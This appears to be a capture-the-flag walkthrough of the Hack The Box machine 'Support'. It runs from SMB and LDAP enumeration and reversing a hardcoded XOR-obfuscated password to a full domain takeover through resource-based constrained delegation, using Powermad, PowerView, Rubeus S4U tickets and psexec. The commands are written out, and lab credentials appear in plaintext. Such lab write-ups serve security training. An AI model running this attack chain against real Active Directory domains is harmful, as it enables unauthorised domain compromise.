Support

Support

Enum

nmap

10.10.11.174

sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP 
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, startng udp (slowwwwww)"
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -o udp --min-rate 1000 $IP

SMB

nxc smb 10.10.11.174 -u 'random' -p '' --shares
image

we can read support-tools

smbclient.py random@10.10.11.174
drw-rw-rw-          0  Wed Jul 20 13:01:06 2022 .
drw-rw-rw-          0  Sat May 28 07:18:25 2022 ..
-rw-rw-rw-    2880728  Sat May 28 07:19:19 2022 7-ZipPortable_21.07.paf.exe
-rw-rw-rw-    5439245  Sat May 28 07:19:55 2022 npp.8.4.1.portable.x64.zip
-rw-rw-rw-    1273576  Sat May 28 07:20:06 2022 putty.exe
-rw-rw-rw-   48102161  Sat May 28 07:19:31 2022 SysinternalsSuite.zip
-rw-rw-rw-     277499  Wed Jul 20 13:01:07 2022 UserInfo.exe.zip
-rw-rw-rw-      79171  Sat May 28 07:20:17 2022 windirstat1_1_2_setup.exe
-rw-rw-rw-   44398000  Sat May 28 07:19:43 2022 WiresharkPortable64_3.6.5.paf.exe

All of these looks to be standard tools besides “UserInfo.exe.zip”

lets download it

Reversing

Dissembling in DotPeek we can see this program is using LDAP to lookup if a user exists or not.

image

it’s loading .getPassword() from the Protected class. If we view that class we can see a password in plaintext.

image
image
using System;
using System.Text;

#nullable disable
namespace UserInfo.Services
{
  internal class Protected
  {
    private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
    private static byte[] key = Encoding.ASCII.GetBytes("armando");

    public static string getPassword()
    {
      byte[] numArray = Convert.FromBase64String(Protected.enc_password);
      byte[] bytes = numArray;
      for (int index = 0; index < numArray.Length; ++index)
        bytes[index] = (byte) ((int) numArray[index] ^ (int) Protected.key[index % Protected.key.Length] ^ 223);
      return Encoding.Default.GetString(bytes);
    }
  }
}

It looks like its xoring an encoded password against the XOR key armando and xoring that against the int 223, after decoding it from base64.

We can use a simple cyberchef recipe to get the plaintext:

image
ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

ldap

lets dump some data from ldap using nxc

nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --query "(objectCategory=*)" ""

Was able to find something that looks like a password in field: “info” (corresponds to the “notes” text box on a user object)

nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --query "(info=*)" ""

or with ldap search

ldapsearch -H ldap://support.htb -x -s base namingcontexts
ldapsearch -H ldap://support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"| less
image
Ironside47pleasure40Watchful
sAMAccountName:      support
support:Ironside47pleasure40Watchful

lets auth

image

EASILY

user flag

8c9....66f

bloodhound remote ingester for more info

sudo bloodhound-python -u 'support' -p 'Ironside47pleasure40Watchful' -ns 10.10.11.174 -d support.htb -c all --zip

bloodhound shows us support is a member of “Shared Support Accounts” OU which has GenericAll against the DC

image

bloodhound will show us how to exploit this to gain complete control over the box and escalate to admin

We need powermad, powerview, and rubeus

git clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.git
git clone https://github.com/Kevin-Robertson/Powermad.git
git clone https://github.com/PowerShellMafia/PowerSploit.git
upload PowerView.ps1
upload Powermad.ps1
upload Rubeus.exe
. .\PowerView.ps1
. .\Powermad.ps1

Create fake computer object with powermad

New-MachineAccount -MachineAccount fakecomp -Password $(ConvertTo-SecureString 'password123!' -AsPlainText -Force)
image
$fakesid = Get-DomainComputer fakecomp | select -expand objectsid
$fakesid
image
 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc.support.htb| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Auth as fake computer and generate rc4 hash

.\Rubeus.exe hash /password:password123! /user:fakecomp /domain:support.htb
image

Grab rc4 hmac and 

.\Rubeus.exe s4u /user:fakecomp$ /rc4:8119935C5F7FA5F57135620C8073AACA /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
image
image

Still don’t have the proper perms

image

maybe we can do it remotely

gonna rerun rubeus with /nowrap to fix formatting issues with the output

.\Rubeus.exe s4u /user:fakecomp$ /rc4:8119935C5F7FA5F57135620C8073AACA /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt /nowrap

Grab the ticket

image
base64 -d b64.kirbi > ticket.kirbi

Convert it with impacket

impacket-ticketConverter ticket.kirbi ticket.ccache
image

set the env variable so psexec can reference the proper ticket & psexec

KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass
image

Final flag

b7c4....f8d39d